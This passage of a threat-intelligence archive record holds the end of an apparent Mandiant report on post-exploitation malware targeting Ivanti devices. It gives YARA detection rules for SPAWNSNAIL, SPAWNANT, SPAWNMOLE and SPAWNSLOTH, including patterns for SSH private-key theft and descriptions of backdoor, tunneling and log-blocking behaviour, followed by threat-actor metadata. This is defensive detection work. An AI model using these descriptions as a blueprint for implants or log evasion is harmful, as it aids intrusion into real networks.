It has the ability to inject a specified\r\nbinary into another process, running a local SSH backdoor when injected into the\r\ndsmdm process, as well as injecting additional malware into dslogserver\"\r\n md5 = \"e7d24813535f74187db31d4114f607a1\"\r\n \r\n strings:\r\n $priv = \"PRIVATE KEY-----\" ascii fullword\r\n \r\n $key1 = \"%d/id_ed25519\" ascii fullword\r\n $key2 = \"%d/id_ecdsa\" ascii fullword\r\n $key3 = \"%d/id_rsa\" ascii fullword\r\n \r\n $sl1 = \"[selinux] enforce\" ascii fullword\r\n $sl2 = \"DSVersion::getReleaseStr()\" ascii fullword\r\n \r\n $ssh1 = \"ssh_set_server_callbacks\" ascii fullword\r\n $ssh2 = \"ssh_handle_key_exchange\" ascii fullword\r\n $ssh3 = \"ssh_add_set_channel_callbacks\" ascii fullword\r\n $ssh4 = \"ssh_channel_close\" ascii fullword\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and $priv and any of ($key*)\r\nand any of ($sl*) and any of ($ssh*)\r\n}\r\nrule M_APT_Installer_SPAWNANT_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects SPAWNANT. SPAWNANT is an\r\ninstaller targeting Ivanti devices. Its purpose is to persistently\r\ninstall other malware from the SPAWN family (SPAWNSNAIL,\r\nSPAWNMOLE) as well as drop additional webshells on the box.\"\r\n \r\n strings:\r\n $s1 = \"dspkginstall\" ascii fullword\r\n $s2 = \"vsnprintf\" ascii fullword\r\n $s3 = \"bom_files\" ascii fullword\r\n $s4 = \"do-install\" ascii\r\n $s5 = \"ld.so.preload\" ascii\r\n $s6 = \"LD_PRELOAD\" ascii\r\n $s7 = \"scanner.py\" ascii\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and 5 of ($s*)\r\n}\r\nrule M_APT_Tunneler_SPAWNMOLE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects specific comparisons in the SPAWNMOLE\r\ntunneler, which allow the malware to filter out its own traffic.\r\nSPAWNMOLE is a tunneler written in C and compiled as an ELF32\r\nexecutable. 
The sample is capable of hijacking a process on the\r\ncompromised system with a specific name and hooking into its\r\ncommunication capabilities in order to create a proxy server for\r\ntunneling traffic.\"\r\n md5 = \"4f79c70cce4207d0ad57a339a9c7f43c\"\r\n \r\n strings:\r\n /*\r\n 3C 16 cmp al, 16h\r\n 74 14 jz short loc_5655C038\r\n 0F B6 45 C1 movzx eax, [ebp+var_3F]\r\n 3C 03 cmp al, 3\r\n 74 0C jz short loc_5655C038\r\n 0F B6 45 C5 movzx eax, [ebp+var_3B]\r\n 3C 01 cmp al, 1\r\n 0F 85 ED 00 00 00 jnz loc_5655C125\r\n */\r\n $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]\r\n3C 01 0F 85 }\r\n /*\r\n 81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h\r\n 0F 85 CD 00 00 00 jnz loc_5655C128\r\n 81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h\r\n 0F 85 C0 00 00 00 jnz loc_5655C128\r\n */\r\n $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3\r\n1B 0F 85}\r\n \r\n \r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nrule M_APT_Utility_SPAWNSLOTH_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects SPAWNSLOTH. SPAWNSLOTH\r\nis a utility targeting Ivanti devices. 
Its purpose is to work\r\ntogether with SPAWNSNAIL and block logging via the dslogserver\r\nprocess when the SPAWNSNAIL backdoor is active.\"\r\n md5 = \"4acfc5df7f24c2354384f7449280d9e0\"\r\n \r\n strings:\r\n $dslog = \"dslogserver\" ascii fullword\r\n $hook1 = \"g_do_syslog_servers_exist\" ascii fullword\r\n $hook2 = \"_ZN5DSLog4File3addEPKci\" ascii fullword\r\n $hook3 = \"funchook_create\" ascii fullword\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en"
	],
	"report_names": [
		"ivanti-post-exploitation-lateral-movement?hl=en"
	],
	"threat_actors": [
		{
			"id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7",
			"created_at": "2023-06-23T02:04:34.793629Z",
			"updated_at": "2026-04-10T02:00:04.971054Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"Bronze Silhouette",
				"Dev-0391",
				"Insidious Taurus",
				"Redfly",
				"Storm-0391",
				"UAT-5918",
				"UAT-7237",
				"UNC3236",
				"VOLTZITE",
				"Vanguard Panda"
			],
			"source_name": "ETDA:Volt Typhoon",
			"tools": [
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8",
			"created_at": "2024-01-18T02:02:34.643994Z",
			"updated_at": "2026-04-10T02:00:04.959645Z",
			"deleted_at": null,
			"main_name": "UNC5221",
			"aliases": [
				"UNC5221",
				"UTA0178"
			],
			"source_name": "ETDA:UNC5221",
			"tools": [
				"BRICKSTORM",
				"GIFTEDVISITOR",
				"GLASSTOKEN",
				"LIGHTWIRE",
				"PySoxy",
				"THINSPOOL",
				"WARPWIRE",
				"WIREFIRE",
				"ZIPLINE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9",
			"created_at": "2024-01-12T02:00:04.33082Z",
			"updated_at": "2026-04-10T02:00:03.517264Z",
			"deleted_at": null,
			"main_name": "UTA0178",
			"aliases": [
				"UNC5221",
				"Red Dev 61"
			],
			"source_name": "MISPGALAXY:UTA0178",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "fe95d824-b40b-42a0-8efd-fa3af8456d14",
			"created_at": "2024-03-21T02:00:04.692668Z",
			"updated_at": "2026-04-10T02:00:03.601506Z",
			"deleted_at": null,
			"main_name": "UNC5325",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC5325",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2f2a7c6c-f414-48f7-8095-e2da5856680e",
			"created_at": "2024-04-20T02:00:03.570471Z",
			"updated_at": "2026-04-10T02:00:03.62238Z",
			"deleted_at": null,
			"main_name": "UNC5266",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC5266",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8306123b-72e8-47b5-8103-17e2d9095b95",
			"created_at": "2024-04-20T02:00:03.573036Z",
			"updated_at": "2026-04-10T02:00:03.623348Z",
			"deleted_at": null,
			"main_name": "UNC5330",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC5330",
			"tools": [
				"GOST",
				"GO Simple Tunnel"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "15a95181-1984-4385-ba2a-272f929fdc85",
			"created_at": "2024-04-20T02:00:03.57553Z",
			"updated_at": "2026-04-10T02:00:03.624427Z",
			"deleted_at": null,
			"main_name": "UNC5337",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC5337",
			"tools": [
				"SPAWNMOLE",
				"SPAWNANT",
				"SPAWNSLOTH"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "42ee1c89-d75c-4e1e-91fa-dab8c0e83bf6",
			"created_at": "2024-04-20T02:00:03.5779Z",
			"updated_at": "2026-04-10T02:00:03.626285Z",
			"deleted_at": null,
			"main_name": "UNC5291",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC5291",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d24c2548-d163-4a73-865f-0d4cb917fee7",
			"created_at": "2024-04-20T02:00:03.580316Z",
			"updated_at": "2026-04-10T02:00:03.628323Z",
			"deleted_at": null,
			"main_name": "UNC3569",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC3569",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a88747e2-ffed-45d8-b847-8464361b2254",
			"created_at": "2023-11-01T02:01:06.605663Z",
			"updated_at": "2026-04-10T02:00:05.289908Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"Volt Typhoon",
				"BRONZE SILHOUETTE",
				"Vanguard Panda",
				"DEV-0391",
				"UNC3236",
				"Voltzite",
				"Insidious Taurus"
			],
			"source_name": "MITRE:Volt Typhoon",
			"tools": [
				"netsh",
				"PsExec",
				"ipconfig",
				"Wevtutil",
				"VersaMem",
				"Tasklist",
				"Mimikatz",
				"Impacket",
				"Systeminfo",
				"netstat",
				"Nltest",
				"certutil",
				"FRP",
				"cmd"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f87ef0bf-0574-492f-aebc-63e5953938e2",
			"created_at": "2024-11-23T02:00:04.116692Z",
			"updated_at": "2026-04-10T02:00:03.779803Z",
			"deleted_at": null,
			"main_name": "Gorilla",
			"aliases": [],
			"source_name": "MISPGALAXY:Gorilla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "49b3063e-a96c-4a43-b28b-1c380ae6a64b",
			"created_at": "2025-08-07T02:03:24.661509Z",
			"updated_at": "2026-04-10T02:00:03.644548Z",
			"deleted_at": null,
			"main_name": "BRONZE SILHOUETTE",
			"aliases": [
				"Dev-0391 ",
				"Insidious Taurus ",
				"UNC3236 ",
				"Vanguard Panda ",
				"Volt Typhoon ",
				"Voltzite "
			],
			"source_name": "Secureworks:BRONZE SILHOUETTE",
			"tools": [
				"Living-off-the-land binaries",
				"Web shells"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4ed2b20c-7523-4852-833b-cebee8029f55",
			"created_at": "2023-05-26T02:02:03.524749Z",
			"updated_at": "2026-04-10T02:00:03.366175Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"BRONZE SILHOUETTE",
				"VANGUARD PANDA",
				"UNC3236",
				"Insidious Taurus",
				"VOLTZITE",
				"Dev-0391",
				"Storm-0391"
			],
			"source_name": "MISPGALAXY:Volt Typhoon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434453,
	"ts_updated_at": 1775792084,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b.pdf",
		"text": "https://archive.orkl.eu/b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b.txt",
		"img": "https://archive.orkl.eu/b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b.jpg"
	}
}